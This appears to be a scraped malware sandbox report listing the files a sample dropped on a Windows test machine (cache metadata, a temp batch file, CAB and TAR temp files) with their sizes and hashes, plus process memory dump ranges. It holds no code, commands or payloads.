d6325e2677362a1262e3825584862c20c414c89c30537406ef34425da0a46b5db73bb9370ac4436ccd04c77440fb5c258b2dff59810da0f0ddfdb70e9e730bbc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ffe84389dcb149ba958f318ebabf1cd3

SHA1
329cbd78d34557b18f22385bd83e93a35b31cdb7

SHA256
56bb8e8ce925c46931c610eec1d027cfd98415acb231650be4e581d0432a1345

SHA512
5565cc053d90471352038ed38c2eaa2b2544a6465e64f11c7dff0910ff11b15bbe740e9155c1f2673d7de57fb27d2c17d467a308070b9efd0b7b42f905162af3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cd92bf573f4502d76ef41975ba64d3c0

SHA1
f03ee0988920cebad8d45bedd71f6c0fbf6220b9

SHA256
16ef4b01bb22d93113e8804f6696e53f8a17719dec97f771223eb51421713a28

SHA512
4b7c8b9926a9b70ea3e7a48d5e0e24ab9a417655b8a899799e70e2e6c7985d642b73b37e542ab7f900eaa8f587288f3db796fe0b97b43cf902e340fbd8ad133e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3bc82192967f0c48f939a307c9221ad9

SHA1
2eee7f5795850d9f13cf86aca82244e8881b0696

SHA256
6208d142b5a92ed9765f38928441fcc979a52444947e04003354a7e5535850d6

SHA512
ee8bdc748625b88a553669f9c398fc8734f82b1e62469b9a3762370e134513d1bd112e58d6b62194f50cbc070b6bc977ee6f6f6d5b30f305c6aea9f23c8af771

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4693959dd2881f5c762924156edcac61

SHA1
eac1022a4f72df52ee56e8676e239c1068e5fa07

SHA256
3cf2ee9d7264873ce87b4d44a99c6bc8d7765bc93be83b4a7f6c0763ac870b6e

SHA512
f5cc816ec9cb439675a24cad7b5a35144aa56fefa6ed6b4327e768b24c492a0ff47bad28eb0b1bb5ce1b22d5df48098ab5f5b10de66a5ceee7e12f73e2a599cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
15a197160ed9cafc02b19f505002d588

SHA1
c5f01ab70ee953003853eaf5768cb94b3bb9d89e

SHA256
e0cfa6b9aff8a35157bcd098d90a889592f4986e7ed588939ad9a7c1208a9e5c

SHA512
d5b0bda8d10c6cae3357d42082fa12d1a4acc3633b5876a13d748eeaaac9b6549d07ec655b5b254703898cc29421d7c418238df71236e0aa0ec27f5eacf2fb14

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
93416b2ec821c0c2292094187b398a64

SHA1
347c5974cde1eb0b9038ab1ba00d086dc733f895

SHA256
4b648959d28bab04d446370a4729d00fd7e823a890cff9508cce32e875527ff1

SHA512
bc5613f631091c04b848666689e02493b07a1b8863d7295d4eec74eabfebb2b31a02b06d63dc605ad451331b862164d94ed13c63932efeb5c1b981d2c556bb6e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
edebacb26072764ffa252508ec75e064

SHA1
6a3a64bf6993db8a00849aa697a31bc789743563

SHA256
d55dd38d529314c3dacf1cd01595f1e8728b031460028a0e510fc4985fc7b7c2

SHA512
4a83acaa31bf58efbab8883ec7225e7897122b4f4f5d646f7719c83d2b14578fd977f6d33ff75e8a0dec336db07b55706304f17de3a4a7c31ead85ed2401c194

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ec16f623ee6c9fd1cd7b0bbd8a21af38

SHA1
00615f0ba9455ff15a7cba35b36041b02afb52e7

SHA256
ae20f54b7cbc860c4279690f26a7073cca2124f79addf3f0ddc473a4c2a672a7

SHA512
73d643e8a7fa5d5bc03ab5c26d4d0c4d0301a3ef6215ddc336f87ca7229fafd015c6b48cc3f699fa3b66f03a6690fc20288691a4e129fac4621ebb5c71b3cd63

Download Submit
C:\Users\Admin\AppData\Local\Temp\BatchByloadStartHid.bat

Filesize
1KB

MD5
45a66afa3b07b3143f0d0c3515898bae

SHA1
cc5baf0c4d2fc0b034974786f20087e058915693

SHA256
8a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6

SHA512
04aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabCF04.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarCFE2.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1f3f584ec76e4f579c84aa7e255c4c2d

SHA1
c10a6a8d4353acef4e4a523ad8076a905173f85f

SHA256
261e08ce14025faed3e33dc12049978d56346c4f71fa679c459edc8886d5c347

SHA512
0aa2fe037985dedc46b35eadca7d8348d221d1a38d7df10d5ab4dbb623f22d0b28d33c7e9efd394c33f29bc1059f25b283ae19575cb7f99605eed0833704038a

Download Submit
memory/2084-13-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-6-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2084-5-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2084-4-0x000007FEF682E000-0x000007FEF682F000-memory.dmp

Filesize
4KB

Download
memory/2084-11-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-10-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-7-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-8-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-9-0x000007FEF6570000-0x000007FEF6F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-57-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2508-56-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2880-19-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2880-20-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download